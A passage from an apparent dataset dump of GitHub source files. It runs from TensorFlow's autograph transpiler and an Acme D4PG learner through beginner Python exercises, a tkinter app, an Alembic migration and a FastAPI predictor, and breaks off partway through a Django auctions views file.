outer_factory_name='outer_factory',\n future_features=()):\n \"\"\"Initializes a function.\"\"\"\n if self._unbound_factory is not None:\n raise ValueError('double 
initialization; create a new object instead')\n\n inner_factory_name = namer.new_symbol(inner_factory_name, ())\n outer_factory_name = namer.new_symbol(outer_factory_name, ())\n nodes = _wrap_into_factory(nodes, self._name, inner_factory_name,\n outer_factory_name, self._freevars,\n self._extra_locals.keys(), future_features)\n\n module, _, source_map = loader.load_ast(\n nodes, include_source_map=True)\n outer_factory = getattr(module, outer_factory_name)\n self._unbound_factory = outer_factory()\n self.module = module\n self.source_map = source_map\n\n def instantiate(self,\n globals_,\n closure,\n defaults=None,\n kwdefaults=None):\n \"\"\"Creates a new function instance.\"\"\"\n if self._unbound_factory is None:\n raise ValueError('call create first')\n\n factory_code = self._unbound_factory.__code__\n factory_freevars = factory_code.co_freevars\n closure_map = dict(zip(self._freevars, closure))\n factory_closure = tuple(\n closure_map[name] for name in factory_code.co_freevars)\n if len(factory_closure) != len(closure):\n raise ValueError(\n 'closure mismatch, requested {}, but source function had {}'.format(\n self._freevars, factory_freevars))\n\n bound_factory = types.FunctionType(\n code=factory_code,\n globals=globals_,\n name=self._name,\n argdefs=(),\n closure=factory_closure)\n\n # The lint override is a false positive.\n new_fn = bound_factory(**self._extra_locals) # pylint:disable=not-callable\n\n if defaults:\n new_fn.__defaults__ = defaults\n if kwdefaults:\n new_fn.__kwdefaults__ = kwdefaults\n\n return new_fn\n\n\nclass GenericTranspiler(object):\n \"\"\"A generic transpiler for Python functions.\n\n Its interface is the `transform` API, which can process Python function\n objects. Internally, it handles parsing.\n\n Users typically subclass this, customizing the `transform_ast` method. The\n output of transformed_ast is returned directly by `transform`. 
Existing\n methods like `transform_function` may also be overloaded.\n\n Example:\n\n class MyTransformer(GenericTranspiler):\n\n def transform_ast(self, node, ctx):\n result = <>\n return result\n\n transformer = MyTransfomer()\n\n result = transformer.transform(f, ...)\n # result is the output\n \"\"\"\n\n def get_transformed_name(self, node):\n \"\"\"Returns a name for the output function. Subclasses may override this.\"\"\"\n if isinstance(node, gast.Lambda):\n return 'lam'\n elif isinstance(node, gast.FunctionDef):\n return node.name\n raise ValueError('Unknown node type {}'.format(node))\n\n def transform_ast(self, node, ctx):\n \"\"\"Performs an actual transformation of a function's AST.\n\n Subclasses must implement this method, and do not usually call it.\n\n Args:\n node: One or more ast.AST nodes representing the AST to be transformed.\n ctx: transformer.Context.\n \"\"\"\n raise NotImplementedError('subclasses must override this')\n\n def transform(self, obj, user_context):\n \"\"\"Transforms a Python object.\n\n Users typically call this method.\n\n Args:\n obj: A Python object, function, type, etc.\n user_context: An opaque object (may be None) that is forwarded to\n transform_ast, through the ctx.user attribute.\n Returns:\n The result of calling transform_function.\n\n Raises:\n NotImplementedError: if the type of obj is not handled.\n \"\"\"\n if inspect.isfunction(obj) or inspect.ismethod(obj):\n return self.transform_function(obj, user_context)\n\n raise NotImplementedError('Non-function: {}'.format(type(obj)))\n\n def _erase_arg_defaults(self, node):\n \"\"\"Erase arg default expressions, which would otherwise be unbound.\"\"\"\n args = node.args\n for i in range(len(args.defaults)):\n args.defaults[i] = parser.parse_expression('None')\n for i, d in enumerate(args.kw_defaults):\n if d is not None:\n args.kw_defaults[i] = parser.parse_expression('None')\n return node\n\n def transform_module(self, mod, user_context):\n \"\"\"Transforms a 
module.\n\n Subclasses may override this method. The return value is opaque.\n\n The method receives the original AST. The result is passed as-is to the\n output of `transform`.\n\n Args:\n mod: A Python module.\n user_context: An opaque object (may be None) that is forwarded to\n transform_ast, through the ctx.user attribute.\n Returns:\n List[Tuple[Any, Any]]. By default it returns the output of transform_ast,\n evaluated on each supported member, other than modules, together with a\n `transformer.Context` containing information about the transformation\n process.\n \"\"\"\n result = []\n for member in mod.__dict__.values():\n if inspect.ismodule(member):\n continue # Not transforming modules recursively.\n try:\n result.append(self.transform(member, user_context))\n except NotImplementedError:\n pass # Skip unsupported elements.\n return result\n\n def transform_function(self, fn, user_context):\n \"\"\"Transforms a function.\n\n Subclasses may override this method. The return value is opaque.\n\n The method receives the original AST. The result is passed as-is to the\n output of `transform`.\n\n Args:\n fn: A function or lambda.\n user_context: An opaque object (may be None) that is forwarded to\n transform_ast, through the ctx.user attribute.\n Returns:\n Tuple[Any, Any]. 
By default it returns the output of transform_ast,\n together with a `transformer.Context` containing information about the\n transformation process.\n \"\"\"\n future_features = inspect_utils.getfutureimports(fn)\n node, source = parser.parse_entity(fn, future_features=future_features)\n logging.log(3, 'Source code of %s:\\n\\n%s\\n', fn, source)\n\n origin_info.resolve_entity(node, source, fn)\n\n namespace = inspect_utils.getnamespace(fn)\n namer = naming.Namer(namespace)\n new_name = namer.new_symbol(self.get_transformed_name(node), ())\n entity_info = transformer.EntityInfo(\n name=new_name,\n source_code=source,\n source_file='',\n future_features=future_features,\n namespace=namespace)\n context = transformer.Context(entity_info, namer, user_context)\n\n node = self._erase_arg_defaults(node)\n result = self.transform_ast(node, context)\n\n return result, context\n\n\nclass PyToPy(GenericTranspiler):\n \"\"\"A generic Python-to-Python transpiler.\n\n Its `transform` method offers a function-in, function-out interface.\n Internally, it takes care of parsing, caching and loading of the translated\n code.\n\n Users typically subclass this, overriding `transform_ast`.\n\n Usually, instances of this class are singletons, since each instance manages\n its own cache. The caching can be controlled by overriding `get_caching_key`.\n\n Example:\n\n class MyTransformer(PyToPy):\n\n def transform_ast(self, node, ctx):\n node = <>\n return node\n\n transformer = MyTransfomer()\n\n new_f, module, source_map = transformer.transform_function(f, ...)\n # new_f is a function with signature identical to f\n\n The transformed function has access to the same namespace as the original\n function. 
To allow access to internal APIs, users may inject additional\n symbols by overriding `get_extra_locals`.\n \"\"\"\n\n def __init__(self):\n self._cache_lock = threading.RLock()\n self._cache = cache.CodeObjectCache()\n\n def get_extra_locals(self):\n \"\"\"Returns extra static local variables to be made to transformed code.\n\n Subclasses must override this.\n\n Returns:\n extra_locals: A Dict[Text, Any] containing additional variables to make\n available to the transformed code.\n \"\"\"\n raise NotImplementedError('subclasses must override this')\n\n def get_caching_key(self, user_context):\n \"\"\"Returns a unique key to use for caching.\n\n Subclasses must override this.\n\n Calls made to `transform_function` with functions that have the same code\n object and caching key will return a cached instance on subsequent\n invocations.\n\n Args:\n user_context: The context object which was passed to `transform`.\n\n Returns:\n extra_locals: A hashable.\n \"\"\"\n raise NotImplementedError('subclasses must override this')\n\n def _cached_factory(self, fn, cache_subkey):\n cached_factory = self._cache[fn][cache_subkey]\n logging.log(3, 'Cache hit for %s subkey %s: %s', fn, cache_subkey,\n cached_factory)\n return cached_factory\n\n def transform_function(self, fn, user_context):\n \"\"\"Transforms a function. See GenericTranspiler.trasnform_function.\n\n This overload wraps the parent's `transform_function`, adding caching and\n facilities to instantiate the output as a Python object. 
It also\n adds facilities to make new symbols available to the generated Python code,\n visible as local variables - see `get_extra_locals`.\n\n Args:\n fn: A function or lambda.\n user_context: An opaque object (may be None) that is forwarded to\n transform_ast, through the ctx.user attribute.\n Returns:\n A tuple:\n * A function or lambda with the same signature and closure as `fn`\n * The temporary module into which the transformed function was loaded\n * The source map as a\n Dict[origin_info.LineLocation, origin_info.OriginInfo]\n \"\"\"\n cache_subkey = self.get_caching_key(user_context)\n\n if self._cache.has(fn, cache_subkey):\n # Fast path: use a lock-free check.\n factory = self._cached_factory(fn, cache_subkey)\n\n else:\n with self._cache_lock:\n # Check again under lock.\n if self._cache.has(fn, cache_subkey):\n factory = self._cached_factory(fn, cache_subkey)\n\n else:\n logging.log(1, '%s is not cached for subkey %s', fn, cache_subkey)\n # TODO(mdan): Confusing overloading pattern. 
Fix.\n nodes, ctx = super(PyToPy, self).transform_function(fn, user_context)\n\n if isinstance(nodes, gast.Lambda):\n nodes = gast.Assign(\n targets=[\n gast.Name(\n ctx.info.name,\n ctx=gast.Store(),\n annotation=None,\n type_comment=None)\n ],\n value=nodes)\n else:\n nodes.name = ctx.info.name\n\n if logging.has_verbosity(2):\n logging.log(2, 'Transformed %s:\\n\\n%s\\n', fn, parser.unparse(nodes))\n\n factory = _PythonFnFactory(\n ctx.info.name, fn.__code__.co_freevars, self.get_extra_locals())\n factory.create(\n nodes, ctx.namer, future_features=ctx.info.future_features)\n self._cache[fn][cache_subkey] = factory\n\n transformed_fn = factory.instantiate(\n globals_=fn.__globals__,\n closure=fn.__closure__ or (),\n defaults=fn.__defaults__,\n kwdefaults=getattr(fn, '__kwdefaults__', None))\n return transformed_fn, factory.module, factory.source_map\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/python/autograph/pyct/transpiler.py","file_name":"transpiler.py","file_ext":"py","file_size_in_byte":16749,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"} +{"seq_id":"26516793705","text":"import time\nfrom typing import Dict, Iterator, List, NamedTuple, Optional, Tuple\n\nimport acme\nfrom acme import types\nfrom acme.jax import networks as networks_lib\nfrom acme.jax import utils\nfrom acme.utils import counting\nfrom acme.utils import loggers\nimport jax\nimport jax.numpy as jnp\nimport optax\nimport reverb\nimport rlax\n\n_PMAP_AXIS_NAME = 'data'\n\n\nclass TrainingState(NamedTuple):\n \"\"\"Contains training state for the learner.\"\"\"\n policy_params: networks_lib.Params\n target_policy_params: networks_lib.Params\n critic_params: networks_lib.Params\n target_critic_params: networks_lib.Params\n policy_opt_state: optax.OptState\n critic_opt_state: optax.OptState\n steps: int\n\n\nclass D4PGLearner(acme.Learner):\n \"\"\"D4PG learner.\n\n This is the learning component of a D4PG agent. 
IE it takes a dataset as input\n and implements update functionality to learn from this dataset.\n \"\"\"\n\n _state: TrainingState\n\n def __init__(self,\n policy_network: networks_lib.FeedForwardNetwork,\n critic_network: networks_lib.FeedForwardNetwork,\n random_key: networks_lib.PRNGKey,\n discount: float,\n target_update_period: int,\n iterator: Iterator[reverb.ReplaySample],\n policy_optimizer: Optional[optax.GradientTransformation] = None,\n critic_optimizer: Optional[optax.GradientTransformation] = None,\n clipping: bool = True,\n counter: Optional[counting.Counter] = None,\n logger: Optional[loggers.Logger] = None,\n jit: bool = True,\n num_sgd_steps_per_step: int = 1):\n\n def critic_mean(\n critic_params: networks_lib.Params,\n observation: types.NestedArray,\n action: types.NestedArray,\n ) -> jnp.ndarray:\n # We add batch dimension to make sure batch concat in critic_network\n # works correctly.\n observation = utils.add_batch_dim(observation)\n action = utils.add_batch_dim(action)\n # Computes the mean action-value estimate.\n logits, atoms = critic_network.apply(critic_params, observation, action)\n logits = utils.squeeze_batch_dim(logits)\n probabilities = jax.nn.softmax(logits)\n return jnp.sum(probabilities * atoms, axis=-1)\n\n def policy_loss(\n policy_params: networks_lib.Params,\n critic_params: networks_lib.Params,\n o_t: types.NestedArray,\n ) -> jnp.ndarray:\n # Computes the discrete policy gradient loss.\n dpg_a_t = policy_network.apply(policy_params, o_t)\n grad_critic = jax.vmap(\n jax.grad(critic_mean, argnums=2), in_axes=(None, 0, 0))\n dq_da = grad_critic(critic_params, o_t, dpg_a_t)\n dqda_clipping = 1. 
if clipping else None\n batch_dpg_learning = jax.vmap(rlax.dpg_loss, in_axes=(0, 0, None))\n loss = batch_dpg_learning(dpg_a_t, dq_da, dqda_clipping)\n return jnp.mean(loss)\n\n def critic_loss(\n critic_params: networks_lib.Params,\n state: TrainingState,\n transition: types.Transition,\n ):\n # Computes the distributional critic loss.\n q_tm1, atoms_tm1 = critic_network.apply(critic_params,\n transition.observation,\n transition.action)\n a = policy_network.apply(state.target_policy_params,\n transition.next_observation)\n q_t, atoms_t = critic_network.apply(state.target_critic_params,\n transition.next_observation, a)\n batch_td_learning = jax.vmap(\n rlax.categorical_td_learning, in_axes=(None, 0, 0, 0, None, 0))\n loss = batch_td_learning(atoms_tm1, q_tm1, transition.reward,\n discount * transition.discount, atoms_t, q_t)\n return jnp.mean(loss)\n\n def sgd_step(\n state: TrainingState,\n transitions: types.Transition,\n ) -> Tuple[TrainingState, Dict[str, jnp.ndarray]]:\n\n # TODO(jaslanides): Use a shared forward pass for efficiency.\n policy_loss_and_grad = jax.value_and_grad(policy_loss)\n critic_loss_and_grad = jax.value_and_grad(critic_loss)\n\n # Compute losses and their gradients.\n policy_loss_value, policy_gradients = policy_loss_and_grad(\n state.policy_params, state.critic_params,\n transitions.next_observation)\n critic_loss_value, critic_gradients = critic_loss_and_grad(\n state.critic_params, state, transitions)\n\n # Average over all devices.\n policy_loss_value, policy_gradients = jax.lax.pmean(\n (policy_loss_value, policy_gradients), _PMAP_AXIS_NAME)\n critic_loss_value, critic_gradients = jax.lax.pmean(\n (critic_loss_value, critic_gradients), _PMAP_AXIS_NAME)\n\n # Get optimizer updates and state.\n policy_updates, policy_opt_state = policy_optimizer.update( # pytype: disable=attribute-error\n policy_gradients, state.policy_opt_state)\n critic_updates, critic_opt_state = critic_optimizer.update( # pytype: disable=attribute-error\n 
critic_gradients, state.critic_opt_state)\n\n # Apply optimizer updates to parameters.\n policy_params = optax.apply_updates(state.policy_params, policy_updates)\n critic_params = optax.apply_updates(state.critic_params, critic_updates)\n\n steps = state.steps + 1\n\n # Periodically update target networks.\n target_policy_params, target_critic_params = optax.periodic_update( # pytype: disable=wrong-arg-types # numpy-scalars\n (policy_params, critic_params),\n (state.target_policy_params, state.target_critic_params), steps,\n self._target_update_period)\n\n new_state = TrainingState(\n policy_params=policy_params,\n critic_params=critic_params,\n target_policy_params=target_policy_params,\n target_critic_params=target_critic_params,\n policy_opt_state=policy_opt_state,\n critic_opt_state=critic_opt_state,\n steps=steps,\n )\n\n metrics = {\n 'policy_loss': policy_loss_value,\n 'critic_loss': critic_loss_value,\n }\n\n return new_state, metrics\n\n # General learner book-keeping and loggers.\n self._counter = counter or counting.Counter()\n self._logger = logger or loggers.make_default_logger(\n 'learner',\n asynchronous=True,\n serialize_fn=utils.fetch_devicearray,\n steps_key=self._counter.get_steps_key())\n\n # Necessary to track when to update target networks.\n self._target_update_period = target_update_period\n\n # Create prefetching dataset iterator.\n self._iterator = iterator\n\n # Maybe use the JIT compiler.\n sgd_step = utils.process_multiple_batches(sgd_step, num_sgd_steps_per_step)\n self._sgd_step = (\n jax.pmap(sgd_step, _PMAP_AXIS_NAME, devices=jax.devices())\n if jit else sgd_step)\n\n # Create the network parameters and copy into the target network parameters.\n key_policy, key_critic = jax.random.split(random_key)\n initial_policy_params = policy_network.init(key_policy)\n initial_critic_params = critic_network.init(key_critic)\n initial_target_policy_params = initial_policy_params\n initial_target_critic_params = initial_critic_params\n\n # Create 
optimizers if they aren't given.\n critic_optimizer = critic_optimizer or optax.adam(1e-4)\n policy_optimizer = policy_optimizer or optax.adam(1e-4)\n\n # Initialize optimizers.\n initial_policy_opt_state = policy_optimizer.init(initial_policy_params) # pytype: disable=attribute-error\n initial_critic_opt_state = critic_optimizer.init(initial_critic_params) # pytype: disable=attribute-error\n\n # Create the initial state and replicate it in all devices.\n self._state = utils.replicate_in_all_devices(\n TrainingState(\n policy_params=initial_policy_params,\n target_policy_params=initial_target_policy_params,\n critic_params=initial_critic_params,\n target_critic_params=initial_target_critic_params,\n policy_opt_state=initial_policy_opt_state,\n critic_opt_state=initial_critic_opt_state,\n steps=0,\n ))\n\n # Do not record timestamps until after the first learning step is done.\n # This is to avoid including the time it takes for actors to come online and\n # fill the replay buffer.\n self._timestamp = None\n\n def step(self):\n # Sample from replay and pack the data in a Transition.\n sample = next(self._iterator)\n transitions = types.Transition(*sample.data)\n\n self._state, metrics = self._sgd_step(self._state, transitions)\n\n # Take the metrics from the first device, since they've been pmeaned over\n # all devices and are therefore identical.\n metrics = utils.get_from_first_device(metrics)\n\n # Compute elapsed time.\n timestamp = time.time()\n elapsed_time = timestamp - self._timestamp if self._timestamp else 0\n self._timestamp = timestamp\n\n # Increment counts and record the current time\n counts = self._counter.increment(steps=1, walltime=elapsed_time)\n\n # Attempts to write the logs.\n self._logger.write({**metrics, **counts})\n\n def get_variables(self, names: List[str]) -> List[networks_lib.Params]:\n variables = {\n 'policy': self._state.target_policy_params,\n 'critic': self._state.target_critic_params,\n }\n return 
utils.get_from_first_device([variables[name] for name in names])\n\n def save(self) -> TrainingState:\n return utils.get_from_first_device(self._state)\n\n def restore(self, state: TrainingState):\n self._state = utils.replicate_in_all_devices(state)\n","repo_name":"deepmind/acme","sub_path":"acme/agents/jax/d4pg/learning.py","file_name":"learning.py","file_ext":"py","file_size_in_byte":9646,"program_lang":"python","lang":"en","doc_type":"code","stars":3100,"dataset":"github-code","pt":"18"} +{"seq_id":"602786306","text":"from unittest.mock import patch\r\n\r\nfrom django.db import transaction\r\nfrom django.test import TestCase\r\nfrom scrapy.crawler import Crawler\r\nfrom scrapy.statscollectors import StatsCollector\r\nfrom scrapy.utils.project import get_project_settings\r\n\r\nfrom bulletin.models import Bulletin\r\nfrom scraper.scraper.pipelines import ScraperPipeline\r\nfrom scraper.scraper.spiders.bulletin import BulletinSpider\r\nfrom scraper.tests.helpers import create_processed_items\r\n\r\n\r\nclass ScraperPipelineTest(TestCase):\r\n\r\n def setUp(self):\r\n self.spider = BulletinSpider(limit=1)\r\n crawler = Crawler(BulletinSpider, settings=get_project_settings())\r\n stats = StatsCollector(crawler)\r\n self.item_pipeline = ScraperPipeline(stats=stats)\r\n self.total_items = 5\r\n self.items = create_processed_items(self.total_items)\r\n\r\n def test_pipeline_successfully_saves_items(self):\r\n for item in self.items:\r\n self.item_pipeline.process_item(item, self.spider)\r\n\r\n self.assertEqual(Bulletin.objects.count(), self.total_items)\r\n self.assertEqual(\r\n self.item_pipeline.stats.get_value('items_saved_to_db'),\r\n self.total_items\r\n )\r\n\r\n @patch('scraper.scraper.pipelines.logging.warning')\r\n def test_pipeline_discards_duplicate_items(self, mock_warning):\r\n # Duplicate an item\r\n self.items[1] = self.items[0]\r\n for item in self.items:\r\n with transaction.atomic():\r\n self.item_pipeline.process_item(item, self.spider)\r\n\r\n 
self.assertEqual(Bulletin.objects.count(), self.total_items - 1)\r\n self.assertEqual(\r\n self.item_pipeline.stats.get_value('items_saved_to_db'),\r\n self.total_items - 1\r\n )\r\n self.assertEqual(\r\n self.item_pipeline.stats.get_value('items_duplicate'),\r\n 1\r\n )\r\n\r\n duplicate_url = self.items[0]['url']\r\n warning_message = f'Unable to save bulletin with URL: {duplicate_url}'\r\n mock_warning.assert_called_with(warning_message)\r\n\r\n @patch('scraper.scraper.pipelines.logging.error')\r\n @patch('scraper.scraper.pipelines.Bulletin.save')\r\n def test_unexpected_errors_when_processing(self, mock_save, mock_error):\r\n # Set ok side effects except for one instance\r\n side_effect = [None for i in range(self.total_items)]\r\n side_effect[2] = ValueError\r\n mock_save.side_effect = side_effect\r\n\r\n for item in self.items:\r\n self.item_pipeline.process_item(item, self.spider)\r\n\r\n self.assertEqual(mock_save.call_count, self.total_items)\r\n self.assertTrue(mock_error.called)\r\n","repo_name":"ralphqq/ph-earthquake-dashboard","sub_path":"scraper/tests/test_pipelines.py","file_name":"test_pipelines.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17792069153","text":"'''\r\nFunctions - a block of organized , reusable code to perform a particular action.\r\nTypes of functions :\r\n1. Built-in Function - print() , input() etc.\r\n2. 
User-defined Functions \r\n'''\r\n\r\n#Function to calculate the factorial , with required parameter.\r\ndef factorial(n): #Function definition with parameter\r\n fact = 1\r\n\r\n for i in range(1,n+1):\r\n fact *= i\r\n return fact #return statement\r\n\r\nprint(factorial(5)) #Calling a function with arguments\r\n\r\n#Function with Default Arguments\r\ndef func(name , age = 35):\r\n print(\"Name:\",name)\r\n print(\"Age:\",age)\r\n\r\nfunc(\"Ashwini\" , 63)\r\nfunc(\"Prachi\")\r\n\r\n#Functions with Keyword arguments\r\ndef func1(name , age = 23 , city = \"Delhi\"):\r\n print(\"Name:\",name)\r\n print(\"Age:\",age)\r\n print(\"City:\",city)\r\n\r\nfunc1(\"Ashwini\" , 26)\r\nfunc1(\"Prachi\")\r\nfunc1(\"Rahul\" , city = \"Bengaluru\")\r\n\r\n#Function with Variable length parameters\r\ndef func2(*args):\r\n print(\"Variable Length keyword functions:\",args)\r\n\r\nfunc2(1,2,3,4,5,67,8)\r\n","repo_name":"Ashwini-Dubey/TestAutomation","sub_path":"Coding/Python/Introduction_To_Python/Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"29147624389","text":"n=input()\nn=n.lower()\nn=n.split( )\ns='aeiou'\nk=[]\nm=[]\nfor i in n:\n for j in i:\n if j in s:\n k.append(j)\nfor i in s:\n if i not in k:\n m.append(i)\nif m==[]:\n print(0)\nelse:\n l=sorted(m)\n print(*l)\n\n ","repo_name":"Farid7786/codemind-python","sub_path":"vowels_not_in_a_string.py","file_name":"vowels_not_in_a_string.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37444708813","text":"from tkinter import *\nfrom tkinter import ttk\n\nroot = Tk()\nroot.title('ComboBox app')\n\ncombobox_selection = StringVar(value='Choose a fruit')\ncounter = IntVar(value=0)\n\n\ndef show_selection():\n globals()\n counter.set(counter.get() + 1)\n if combobox_selection.get() != 
'Choose a fruit':\n ttk.Label(text=combobox_selection.get()).grid(row=counter.get(), column=1)\n\n\ncombobox = ttk.Combobox(width=25, textvariable=combobox_selection)\ncombobox['values'] = ('Apple', 'Orange', 'Mango', 'Cashew', 'Papaya', 'Melon')\ncombobox.grid(row=0, column=1)\n\nttk.Label(text='Select your fruit').grid(row=0, column=0)\nttk.Button(text='Show Selection', command=show_selection).grid(row=1, column=0)\n\nroot.mainloop()\n","repo_name":"Minicoru/LearningPythonBeginner","sub_path":"ComboBox.py","file_name":"ComboBox.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74602582759","text":"class Solution:\n def isMonotonic(self, nums: List[int]) -> bool:\n increasing = False\n decreasing = False\n \n for i in range(1, len(nums)):\n if nums[i] > nums[i-1]:\n increasing = True\n elif nums[i] < nums[i-1]:\n decreasing = True\n \n if increasing == False and decreasing == False:\n return True\n return increasing != decreasing","repo_name":"Ayomipo18/Data-Structures-and-Algorithms-LeetCode","sub_path":"0896-monotonic-array/0896-monotonic-array.py","file_name":"0896-monotonic-array.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"41945689514","text":"#Loop que executa ações enquenato a condição for verdadeira, faz uma repetição com um numero de repeticoes definida ou infinita\n\nnotas = []\n\ncontador = 1\n\nwhile contador <= 5:\n codigo_aluno = input(\"RM: \")\n nota = float(input(\"Nota: \"))\n resultado = [codigo_aluno, nota]\n notas.append(resultado)\n\n contador = contador + 1\n\nprint(\"Quantidade de notas\", 
len(notas))","repo_name":"rafaeldeje/python-rules","sub_path":"python-rules/workspace/10-Repetições/While/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26062108384","text":"\"\"\"job application\n\nRevision ID: 7bb9d6ce548f\nRevises: c0cee112ff47\nCreate Date: 2023-04-24 11:35:58.484218\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '7bb9d6ce548f'\ndown_revision = 'c0cee112ff47'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('job_application',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('job_id', sa.Integer(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('company_id', sa.Integer(), nullable=True),\n sa.Column('contact_number', sa.Integer(), nullable=False),\n sa.Column('contact_email', sa.String(length=120), nullable=False),\n sa.Column('resume', sa.Text(), nullable=False),\n sa.Column('message', sa.Text(), nullable=True),\n sa.Column('reply', sa.Text(), nullable=True),\n sa.Column('status', sa.Enum('submited', 'reviewed', 'interview', 'offered', 'rejected', name='jobapplicationstatus'), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['company_id'], ['company.id'], ),\n sa.ForeignKeyConstraint(['job_id'], ['job.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n with op.batch_alter_table('job_application', schema=None) as batch_op:\n batch_op.create_index(batch_op.f('ix_job_application_contact_email'), ['contact_email'], unique=False)\n batch_op.create_index(batch_op.f('ix_job_application_created_at'), ['created_at'], unique=False)\n 
batch_op.create_index(batch_op.f('ix_job_application_updated_at'), ['updated_at'], unique=False)\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('job_application', schema=None) as batch_op:\n batch_op.drop_index(batch_op.f('ix_job_application_updated_at'))\n batch_op.drop_index(batch_op.f('ix_job_application_created_at'))\n batch_op.drop_index(batch_op.f('ix_job_application_contact_email'))\n\n op.drop_table('job_application')\n # ### end Alembic commands ###\n","repo_name":"waikitpo/itp4115_EA_D05","sub_path":"migrations/versions/7bb9d6ce548f_job_application.py","file_name":"7bb9d6ce548f_job_application.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43389407140","text":"class student:\n \n def getStudent(self):\n print(\"ID: \",self.ID)\n print(\"Name: \",self.name)\n print(\"Discipline: \",self.dis)\n print(\"Marks: \",self.marks)\n\n def setStudent(self):\n print(\"Enter ID:\")\n self.ID=int(input())\n print(\"Enter name:\")\n self.name=input()\n print(\"Enter Discipline:\")\n self.dis=input()\n i=1\n self.marks=[]\n print(\"Enter number of subjects to enter:\")\n self.n=int(input())\n for i in range(1,self.n+1):\n print(\"Enter Marks \",i ,\": \")\n a=int(input())\n self.marks.append(a)\n \n def avg(self):\n print(\"\")\n\n \nprint(\"Enter the number of students to enter:\")\nnum=int(input())\ni=0\nstu=[]\nfor i in range(0,num):\n stu.append(i)\n stu[i]=student()\n stu[i].setStudent()\ni=0\nfor i in range(0,num):\n stu[i].getStudent()\n","repo_name":"Archit-Jain05/Python-Codes","sub_path":"College/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72851725161","text":"from fastapi import FastAPI, Depends\nfrom 
fastapi.responses import JSONResponse\nfrom next_word_predictor import Model, get_model\n\napp = FastAPI()\n\n\n@app.get(\"/\")\ndef read_root():\n return {\"Hello\": \"World\"}\n\n\n@app.get(\"/predict/{q}\")\ndef read_item(q: str = None, bert_model: Model = Depends(get_model)):\n print(q)\n predictions = bert_model.predict(q)\n\n content = {\"q\": q, \"predictions\": predictions}\n headers = {\"Access-Control-Allow-Origin\": \"*\"}\n\n return JSONResponse(content=content, headers=headers)\n\n","repo_name":"christinabo/next-word-predictor-bert","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14363933322","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.db import IntegrityError\nfrom django.db.models import Max\nfrom django.core.exceptions import ValidationError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.utils.datastructures import MultiValueDictKeyError\n\nfrom .models import User, Listing, Bid, Comment, Watchlist\n\n\ndef index(request):\n try:\n currentUser = request.user.id\n person = User.objects.get(id=currentUser)\n return render(request, \"auctions/index.html\", {\n \"listings\": Listing.objects.all().filter(closed=False),\n \"watchlistCount\": Watchlist.objects.filter(person=person).count()\n })\n except User.DoesNotExist:\n return render(request, \"auctions/index.html\", {\n \"listings\": Listing.objects.all().filter(closed=False)\n })\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is 
not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"auctions/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/register.html\")\n\n\n@login_required\ndef create(request):\n currentUser = request.user.id\n person = User.objects.get(id=currentUser)\n if request.method == \"POST\":\n title = request.POST[\"title\"]\n description = request.POST[\"description\"]\n price = request.POST[\"price\"]\n category = request.POST[\"category\"]\n\n # Upload image to model, exception if no image is selected\n try:\n image = request.FILES[\"image\"]\n except MultiValueDictKeyError:\n image = request.POST.get('image', 